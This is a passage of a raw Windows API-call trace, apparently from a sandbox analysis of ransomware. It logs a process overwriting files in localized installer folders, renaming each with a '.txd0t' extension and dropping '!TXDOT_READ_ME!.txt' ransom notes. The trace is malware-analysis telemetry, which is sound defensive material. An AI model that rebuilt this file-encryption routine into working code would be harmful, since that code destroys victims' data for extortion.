liDistanceToMove=0xfffed250, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.635] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x12db0, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x12db0, lpOverlapped=0x0) returned 1 [0085.635] FlushFileBuffers (hFile=0x474) returned 1 [0085.725] GetProcessHeap () returned 0xe30000 [0085.725] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0085.725] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" [0085.725] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned="LocalizedData.xml" [0085.725] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.725] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1033\\!TXDOT_READ_ME!.txt") returned 1 [0085.725] GetProcessHeap () returned 0xe30000 [0085.725] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.725] CloseHandle (hObject=0x474) returned 1 [0085.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml.txd0t")) returned 1 [0085.726] SetEvent (hEvent=0x3f8) returned 1 [0085.726] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0085.727] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" [0085.727] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf.txd0t" [0085.727] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf.txd0t") returned 0 [0085.727] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.727] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0085.727] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=4254) returned 1 [0085.727] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.727] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0085.729] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffed62, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.729] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x1090, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0x1090, lpOverlapped=0x0) returned 1 [0085.730] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffef70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.730] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0x1090, lpOverlapped=0x0) returned 1 [0085.730] FlushFileBuffers (hFile=0x474) returned 1 [0085.734] GetProcessHeap () returned 0xe30000 [0085.734] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0085.734] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" [0085.734] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf") returned="eula.rtf" [0085.734] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.734] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1038\\!TXDOT_READ_ME!.txt") returned 0 [0085.734] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1038\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0085.737] WriteFile (in: hFile=0x468, lpBuffer=0x37ff484*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x37ff484*, lpNumberOfBytesWritten=0x37ff480*=0x2, lpOverlapped=0x0) returned 1 [0085.737] FlushFileBuffers (hFile=0x468) returned 1 [0085.744] WriteFile (in: hFile=0x468, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff480*=0x7f0, lpOverlapped=0x0) returned 1 [0085.746] FlushFileBuffers (hFile=0x468) returned 1 [0085.753] CloseHandle (hObject=0x468) returned 1 [0085.753] GetProcessHeap () returned 0xe30000 [0085.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.753] CloseHandle (hObject=0x474) returned 1 [0085.754] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf.txd0t")) returned 1 [0085.754] SetEvent (hEvent=0x3f8) returned 1 [0085.754] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0085.755] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" [0085.755] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf.txd0t" [0085.755] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf.txd0t") returned 0 [0085.755] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.756] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0085.756] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=3643) returned 1 [0085.756] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.756] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0085.758] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffefc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.758] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xe30, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0xe30, lpOverlapped=0x0) returned 1 [0085.758] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffff1d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.758] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0xe30, lpOverlapped=0x0) returned 1 [0085.758] FlushFileBuffers (hFile=0x474) returned 1 [0085.763] GetProcessHeap () returned 0xe30000 [0085.763] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0085.763] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" [0085.763] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf") returned="eula.rtf" [0085.763] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.763] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1040\\!TXDOT_READ_ME!.txt") returned 0 [0085.763] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1040\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0085.765] WriteFile (in: hFile=0x468, lpBuffer=0x37ff484*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x37ff484*, lpNumberOfBytesWritten=0x37ff480*=0x2, lpOverlapped=0x0) returned 1 [0085.766] FlushFileBuffers (hFile=0x468) returned 1 [0085.768] WriteFile (in: hFile=0x468, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff480*=0x7f0, lpOverlapped=0x0) returned 1 [0085.769] FlushFileBuffers (hFile=0x468) returned 1 [0085.770] CloseHandle (hObject=0x468) returned 1 [0085.770] GetProcessHeap () returned 0xe30000 [0085.770] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.770] CloseHandle (hObject=0x474) returned 1 [0085.770] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf.txd0t")) returned 1 [0085.771] SetEvent (hEvent=0x3f8) returned 1 [0085.771] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0085.774] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" [0085.774] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.txd0t" [0085.774] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.txd0t") returned 0 [0085.774] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.774] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0085.774] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=80060) returned 1 [0085.774] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.774] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0085.776] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffec544, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.776] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x138b0, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x138b0, lpOverlapped=0x0) returned 1 [0085.778] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffec750, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.778] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x138b0, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x138b0, lpOverlapped=0x0) returned 1 [0085.779] FlushFileBuffers (hFile=0x474) returned 1 [0085.857] GetProcessHeap () returned 0xe30000 [0085.857] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0085.857] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" [0085.857] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned="LocalizedData.xml" [0085.857] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.857] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1040\\!TXDOT_READ_ME!.txt") returned 1 [0085.857] GetProcessHeap () returned 0xe30000 [0085.857] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.857] CloseHandle (hObject=0x474) returned 1 [0085.857] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml.txd0t")) returned 1 [0085.858] SetEvent (hEvent=0x3f8) returned 1 [0085.858] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0085.869] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" [0085.869] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.txd0t" [0085.869] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.txd0t") returned 0 [0085.869] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.869] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0085.869] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=65238) returned 1 [0085.869] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.869] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0085.875] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffeff2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.875] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xfed0, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0xfed0, lpOverlapped=0x0) returned 1 [0085.877] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff0130, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.877] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xfed0, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0xfed0, lpOverlapped=0x0) returned 1 [0085.877] FlushFileBuffers (hFile=0x468) returned 1 [0086.101] GetProcessHeap () returned 0xe30000 [0086.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe41328 [0086.102] StrCpyW (in: psz1=0xe41328, psz2="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" [0086.103] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned="LocalizedData.xml" [0086.103] StrCpyW (in: psz1=0xe41366, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.103] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1042\\!TXDOT_READ_ME!.txt") returned 1 [0086.104] GetProcessHeap () returned 0xe30000 [0086.104] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe41328 | out: hHeap=0xe30000) returned 1 [0086.104] CloseHandle (hObject=0x468) returned 1 [0086.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml.txd0t")) returned 1 [0086.105] SetEvent (hEvent=0x3f8) returned 1 [0086.108] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0086.108] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" [0086.108] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.txd0t" [0086.108] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.txd0t") returned 0 [0086.108] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0086.109] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0086.109] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=82374) returned 1 [0086.109] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.109] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0086.110] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffebc3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.111] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x141c0, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x141c0, lpOverlapped=0x0) returned 1 [0086.113] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffebe40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.113] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x141c0, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x141c0, lpOverlapped=0x0) returned 1 [0086.113] FlushFileBuffers (hFile=0x468) returned 1 [0086.257] GetProcessHeap () returned 0xe30000 [0086.257] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe41328 [0086.259] StrCpyW (in: psz1=0xe41328, psz2="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" [0086.259] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned="LocalizedData.xml" [0086.259] StrCpyW (in: psz1=0xe41366, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.259] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1045\\!TXDOT_READ_ME!.txt") returned 1 [0086.259] GetProcessHeap () returned 0xe30000 [0086.259] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe41328 | out: hHeap=0xe30000) returned 1 [0086.259] CloseHandle (hObject=0x468) returned 1 [0086.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml.txd0t")) returned 1 [0086.259] SetEvent (hEvent=0x3f8) returned 1 [0086.259] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0086.262] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" [0086.262] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf.txd0t" [0086.262] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf.txd0t") returned 0 [0086.262] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf", dwFileAttributes=0x80) returned 1 [0086.262] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0086.262] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=3865) returned 1 [0086.262] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.263] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0086.265] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffeee7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.265] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xf10, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0xf10, lpOverlapped=0x0) returned 1 [0086.265] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffff0f0, lpNewFilePointer=0xffffffff, 